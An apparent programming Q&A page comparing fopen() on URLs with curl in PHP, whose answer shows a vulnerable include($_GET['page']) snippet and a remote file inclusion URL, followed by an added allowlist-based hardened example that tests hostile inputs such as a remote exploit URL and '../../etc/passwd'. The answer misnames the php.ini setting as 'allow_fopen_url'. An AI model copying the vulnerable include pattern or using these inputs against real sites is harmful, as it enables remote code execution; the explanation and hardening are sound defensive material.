What are the important differences between using fopen($url) and curl in PHP?


Question

I'm writing some code that will need to speak to a web service over HTTP(s). In the past I've used the curl library. Recently, I noticed that I can simply use fopen() to access a remote URL and it seems far simpler.

Curl seems to be much more configurable, having a plethora of options. Beyond that configurability, does it matter which method is used? If so, which is better and why?

Answer

fopen() will only open remote URLs if allow_fopen_url is enabled in php.ini.

However in versions prior to 5.2.0, this was exceedingly dangerous because the include function would also download and parse PHP code from remote sites. A naive coder could easily be caught out with code like:

<?php
    $page = $_GET['page'];
    include($page);
?>

at which point an attacker just has to ask for http://example.com/script.php?page=http://example.net/my_exploit_script to execute their own code on the system and introduce an exploit. Unfortunately the default value for allow_fopen_url is 'on'.

Fortunately, since 5.2.0 there's a separate setting (which should default to 'off') called allow_url_include which prevents include from downloading remote code.

Personally, if you've got the option to use Curl, use that rather than fopen.
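
A hardened counterpart to the include() snippet in the answer, added here as an example and not part of the original answer: the request value only selects an entry from a fixed map and never reaches include as a path or URL, and the script reports whether PHP's URL-wrapper directives (`allow_url_fopen`, `allow_url_include`) are enabled. The page names, the pages/ directory and both function names are hypothetical.

```php
<?php
declare(strict_types=1);

// Hypothetical page map: the only files this script will ever include.
const PAGES = [
    'home'    => 'home.php',
    'contact' => 'contact.php',
];

/**
 * Resolve a user-supplied page name to a local file path, or null.
 * The request value is used only as an array key, never as a path or URL.
 */
function resolve_page($requested, string $baseDir): ?string
{
    if (!is_string($requested) || !array_key_exists($requested, PAGES)) {
        return null;
    }
    return rtrim($baseDir, '/') . '/' . PAGES[$requested];
}

/** Report URL-wrapper settings that widen the impact of a tainted include(). */
function url_wrapper_findings(): array
{
    $on = static fn(string $key): bool =>
        filter_var(ini_get($key), FILTER_VALIDATE_BOOLEAN);
    $findings = [];
    if ($on('allow_url_include')) {
        $findings[] = 'allow_url_include is on: include/require can load remote code';
    }
    if ($on('allow_url_fopen')) {
        $findings[] = 'allow_url_fopen is on: fopen()/file_get_contents() accept URLs';
    }
    return $findings;
}

// Constructed sample inputs, including the remote URL quoted in the answer.
$samples = ['home', 'http://example.net/my_exploit_script', '../../etc/passwd', ['x']];
foreach ($samples as $input) {
    $path = resolve_page($input, __DIR__ . '/pages');
    printf("%-42s => %s\n", json_encode($input, JSON_UNESCAPED_SLASHES), $path ?? 'rejected');
}
foreach (url_wrapper_findings() as $finding) {
    echo "config: $finding\n";
}
```

In a real handler, a null result from `resolve_page()` would return a 404 and the non-null path would be the only value ever handed to include.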
